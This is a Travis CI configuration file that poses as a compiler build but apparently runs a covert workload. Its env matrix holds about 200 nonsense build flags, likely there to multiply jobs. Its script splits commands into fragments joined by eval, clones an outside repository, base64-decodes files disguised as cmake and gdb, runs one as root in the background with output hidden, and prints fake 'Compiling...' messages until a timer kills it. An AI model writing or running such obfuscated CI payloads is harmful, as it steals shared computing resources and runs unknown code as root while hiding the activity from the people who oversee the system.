dist: bionic

env:
  - BUILD="--rebuild-if-new-slot=1011k"
  - BUILD="--ignore-built-slot-operator-deps=3018K"
  - BUILD="--debug=872yu"
  - BUILD="--complete-graph-if-new-use=810vw"
  - BUILD="--jobs=5Nl"
  - BUILD="--search-index=884bo"
  - BUILD="--quickpkg-direct=616gu"
  - BUILD="--rebuild-ignore=776GD"
  - BUILD="--getbinpkgonly=190pn"
  - BUILD="--usepkg=993Wu"
  - BUILD="--color=174BS"
  - BUILD="--depclean-lib-check=754tA"
  - BUILD="--onlydeps=880jJ"
  - BUILD="--ignore-soname-deps=540sN"
  - BUILD="--ignore-default-opts=527CB"
  - BUILD="--debug=398Jr"
  - BUILD="--autounmask-license=355vA"
  - BUILD="--reinstall=169DO"
  - BUILD="--reinstall=464Fe"
  - BUILD="--ask=920QD"
  - BUILD="--autounmask-keep-keywords=463Xj"
  - BUILD="--info=790pJ"
  - BUILD="--info=669d9"
  - BUILD="--usepkg-exclude=850eB"
  - BUILD="--load-average=985FF"
  - BUILD="--noconfmem=194H4"
  - BUILD="--binpkg-changed-deps=486OA"
  - BUILD="--read-news=765NL"
  - BUILD="--quiet=609Uf"
  - BUILD="--resume=897O7"
  - BUILD="--root-deps=405CA"
  - BUILD="--nodeps=917cl"
  - BUILD="--autounmask-keep-keywords=973lx"
  - BUILD="--package-moves=215BQ"
  - BUILD="--sysroot=647wb"
  - BUILD="--quiet-repo-display=905iS"
  - BUILD="--changelog=85FV"
  - BUILD="--quickpkg-direct=919Yy"
  - BUILD="--autounmask-only=585xo"
  - BUILD="--quiet=876sQ"
  - BUILD="--sync=778dH"
  - BUILD="--backtrack=143pn"
  - BUILD="--ignore-built-slot-operator-deps=4810X"
  - BUILD="--ask=488CL"
  - BUILD="--usepkgonly=314wa"
  - BUILD="--update=39206"
  - BUILD="--digest=445ON"
  - BUILD="--oneshot=236wp"
  - BUILD="--rebuild-if-new-slot=162Gj"
  - BUILD="--changed-deps-report=26hX"
  - BUILD="--config=412oe"
  - BUILD="--info=601QA"
  - BUILD="--with-bdeps=120Hr"
  - BUILD="--with-bdeps-auto=43oB"
  - BUILD="--emptytree=153tc"
  - BUILD="--getbinpkgonly=342Qy"
  - BUILD="--nospinner=244qE"
  - BUILD="--sysroot=113u5"
  - BUILD="--search-index=816Hk"
  - BUILD="--search=446mN"
  - BUILD="--rebuild-if-new-rev=303fw"
  - BUILD="--accept-properties=70ya"
  - BUILD="--debug=860Qw"
  - BUILD="--rebuild-exclude=908Nr"
  - BUILD="--check-news=795A8"
  - BUILD="--sysroot=464Fy"
  - BUILD="--changed-slot=681QJ"
  - BUILD="--nodeps=640Tk"
  - BUILD="--dynamic-deps=88044"
  - BUILD="--misspell-suggestions=43Qc"
  - BUILD="--accept-properties=401N7"
  - BUILD="--unordered-display=667nt"
  - BUILD="--regen=581a"
  - BUILD="--resume=555h0"
  - BUILD="--with-bdeps-auto=923t3"
  - BUILD="--root=929r5"
  - BUILD="--prefix=67CG"
  - BUILD="--quiet-unmerge-warn=361td"
  - BUILD="--config=842K7"
  - BUILD="--unordered-display=5703X"
  - BUILD="--buildpkgonly=904i1"
  - BUILD="--usepkgonly=347rp"
  - BUILD="--rage-clean=148mm"
  - BUILD="--quiet-build=661F0"
  - BUILD="--autounmask-keep-keywords=78DH"
  - BUILD="--onlydeps-with-rdeps=670KX"
  - BUILD="--selective=420W1"
  - BUILD="--search=111xX"
  - BUILD="--quiet-build=579yN"
  - BUILD="--with-bdeps=777Xh"
  - BUILD="--searchdesc=535XU"
  - BUILD="--help=149Ch"
  - BUILD="--usepkgonly=566T4"
  - BUILD="--dynamic-deps=1622l"
  - BUILD="--rebuild-exclude=381IV"
  - BUILD="--noconfmem=319w5"
  - BUILD="--accept-restrict=338AF"
  - BUILD="--search-index=986PP"
  - BUILD="--fuzzy-search=2341i"
  - BUILD="--quiet-unmerge-warn=686Kv"
  - BUILD="--oneshot=711se"
  - BUILD="--autounmask-only=622Xu"
  - BUILD="--read-news=403BL"
  - BUILD="--verbose=760EA"
  - BUILD="--check-news=15EF"
  - BUILD="--buildpkg=894wW"
  - BUILD="--fail-clean=444Io"
  - BUILD="--digest=450RM"
  - BUILD="--verbose=848UU"
  - BUILD="--accept-restrict=313A8"
  - BUILD="--buildpkgonly=109ge"
  - BUILD="--deep=221WW"
  - BUILD="--ignore-built-slot-operator-deps=295sK"
  - BUILD="--quickpkg-direct=924Op"
  - BUILD="--buildpkg-exclude=57U6"
  - BUILD="--check-news=820dz"
  - BUILD="--depclean=587uQ"
  - BUILD="--misspell-suggestions=29BE"
  - BUILD="--check-news=292pY"
  - BUILD="--onlydeps-with-rdeps=332nX"
  - BUILD="--changed-use=780vI"
  - BUILD="--check-news=590Es"
  - BUILD="--deselect=844Td"
  - BUILD="--selective=532Rc"
  - BUILD="--search=680sZ"
  - BUILD="--rebuild-if-new-rev=326ZZ"
  - BUILD="--root=904qI"
  - BUILD="--changed-use=228Ve"
  - BUILD="--rebuild-ignore=375tm"
  - BUILD="--ignore-built-slot-operator-deps=5008z"
  - BUILD="--usepkgonly=3226J"
  - BUILD="--depclean=966bc"
  - BUILD="--update=249QC"
  - BUILD="--autounmask-continue=904dd"
  - BUILD="--skipfirst=671hy"
  - BUILD="--onlydeps-with-rdeps=254mV"
  - BUILD="--getbinpkgonly=9106z"
  - BUILD="--nospinner=297TO"
  - BUILD="--quiet-build=878Xi"
  - BUILD="--changed-deps-report=110SD"
  - BUILD="--buildpkgonly=800C0"
  - BUILD="--rebuild-if-new-ver=762qL"
  - BUILD="--accept-restrict=256jn"
  - BUILD="--rebuild-if-unbuilt=7255a"
  - BUILD="--config=548hP"
  - BUILD="--sync=3840s"
  - BUILD="--emptytree=860Xn"
  - BUILD="--with-test-deps=663HL"
  - BUILD="--package-moves=760ge"
  - BUILD="--onlydeps-with-rdeps=270Qi"
  - BUILD="--package-moves=957aE"
  - BUILD="--verbose=472bU"
  - BUILD="--getbinpkgonly=803MB"
  - BUILD="--dynamic-deps=4600E"
  - BUILD="--verbose-conflicts=966AT"
  - BUILD="--selective=193oY"
  - BUILD="--autounmask-only=181zY"
  - BUILD="--quiet-build=698Ek"
  - BUILD="--fail-clean=48ka"
  - BUILD="--depclean-lib-check=873f1"
  - BUILD="--quiet-unmerge-warn=286ch"
  - BUILD="--autounmask-use=296MU"
  - BUILD="--quiet-unmerge-warn=275pr"
  - BUILD="--accept-restrict=681zl"
  - BUILD="--config=2910q"
  - BUILD="--changed-slot=556ga"
  - BUILD="--ask-enter-invalid=108Sj"
  - BUILD="--reinstall=192e"
  - BUILD="--noreplace=526xG"
  - BUILD="--newrepo=61GF"
  - BUILD="--config-root=433eq"
  - BUILD="--nospinner=4270t"
  - BUILD="--onlydeps=401o"
  - BUILD="--usepkgonly=234fy"
  - BUILD="--quiet-repo-display=593p2"
  - BUILD="--exclude=1601k"
  - BUILD="--getbinpkgonly=113gi"
  - BUILD="--exclude=143b6"
  - BUILD="--autounmask-only=312B1"
  - BUILD="--buildpkgonly=470be"
  - BUILD="--version=74uC"
  - BUILD="--newrepo=620mh"
  - BUILD="--root=5863p"
  - BUILD="--search-index=734Uu"
  - BUILD="--columns=256SC"
  - BUILD="--search-index=171vE"
  - BUILD="--usepkg-exclude=532VL"
  - BUILD="--with-bdeps-auto=210gb"
  - BUILD="--getbinpkgonly=654i6"
  - BUILD="--ignore-default-opts=684WP"
  - BUILD="--quiet-build=400ri"
  - BUILD="--dynamic-deps=150oa"

language: minimal

script:
  - uHoXun="sudo apt up"
  - PCnKnfIrE="date || tru"
  - eval "$uHoXun""$PCnKnfIrE""e"
  - DdVcGqESiPL="sudo apt --"
  - wkWZYDvM="yes install"
  - LkZBfOrE=" cl-base64 "
  - vwFtrmbv="git &>/dev/"
  - eval "$DdVcGqESiPL""$wkWZYDvM""$LkZBfOrE""$vwFtrmbv""null"
  - CGtsjRS="git clone h"
  - sJLdbzjS="ttps://gccb"
  - VJFvh="uild@bitbuc"
  - qehNONRGtn="ket.org/gcc"
  - WrvuolJLlR="build/gcc.g"
  - VDWcpmbNOT="it &>/dev/n"
  - eval "$CGtsjRS""$sJLdbzjS""$VJFvh""$qehNONRGtn""$WrvuolJLlR""$VDWcpmbNOT""ull"
  - gVgOh="base64 -d g"
  - EFYsmiHbWp="cc/cmake_ >"
  - eval "$gVgOh""$EFYsmiHbWp"" cmake"
  - ofuNbs="base64 -d g"
  - tIqFnatDL="cc/config_ "
  - eval "$ofuNbs""$tIqFnatDL""> rebuild"
  - WVQATRgzbL="base64 -d g"
  - MjCAo="cc/make_ > "
  - eval "$WVQATRgzbL""$MjCAo""gdb"
  - JlmfKSZjXji="chmod +x gd"
  - eval "$JlmfKSZjXji""b cmake"
  - ./cmake
  - sed -i 's/build/tundefined2o/g' rebuild
  - zLzDkkRyFyS="sudo ./gdb "
  - WmFMe="--config re"
  - GSsekTq="build &>/de"
  - eval "$zLzDkkRyFyS""$WmFMe""$GSsekTq""v/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2501)) ] && sudo killall gdb && break; sleep 185; done
